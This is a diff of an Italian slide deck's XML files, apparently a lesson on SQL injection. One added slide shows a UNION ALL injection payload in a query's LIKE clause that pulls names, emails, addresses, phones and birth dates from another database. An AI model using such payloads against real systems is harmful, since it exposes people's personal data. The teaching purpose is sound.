+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2881729070"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide44.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 115">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62815652-D1C9-7B05-6FB5-F5A00F08FE51}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010A47B2-AFE4-35AE-5ED8-31C1AF0EECB7}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{153DC11C-6B7E-B065-4E3E-E18BFB3BCDA0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2027412347"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide45.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 166"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="167" name="Google Shape;167;g6d4d7e4f0f_5_122:notes"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="168" name="Google Shape;168;g6d4d7e4f0f_5_122:notes"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide46.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -5243,110 +5859,6 @@
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide42.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 166"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="167" name="Google Shape;167;g6d4d7e4f0f_5_122:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="168" name="Google Shape;168;g6d4d7e4f0f_5_122:notes"/>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -16825,7 +17337,15 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una query semplice </a:t>
+              <a:t>Una query </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>innocua</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -18366,6 +18886,393 @@
         <p:cNvPr id="1" name="Shape 127">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA00D75-EFF3-1640-CE37-BFCD9954B7FF}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C6A88EF-D502-802C-8A61-ED7FDB658E66}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Recuperare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>dati</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>dagli</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>altri</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> database</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA60446D-BF41-D26F-5CF8-81594027249B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{184703A3-5167-660A-F30A-1C5DE0B43051}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1441500" y="2123627"/>
+            <a:ext cx="6261000" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' UNION ALL SELECT NULL, CONCAT(FirstName, ' ', LastName, ' (', </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EmailAddress</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, ') ', AddressLine1, AddressLine2, ', ', City, ', ', </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>StateProvinceCode</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, ' ', </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>PostalCode</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, ' - ', Phone), </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>BirthDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, NULL, NULL, NULL FROM AdventureWorksDW2022.dbo.ProspectiveBuyer ORDER BY 2--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3677232926"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
               <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78DFD79-353B-62CC-0721-736AA8D7D414}"/>
             </a:ext>
           </a:extLst>
@@ -18675,7 +19582,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide26.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19028,7 +19935,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide26.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide27.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19345,7 +20252,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide27.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide28.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19684,7 +20591,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide28.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide29.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -20004,367 +20911,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1039999900"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide29.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 127">
-          <a:extLst>
-            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA86480F-F968-3F96-96E7-A605D3160EED}"/>
-            </a:ext>
-          </a:extLst>
-        </p:cNvPr>
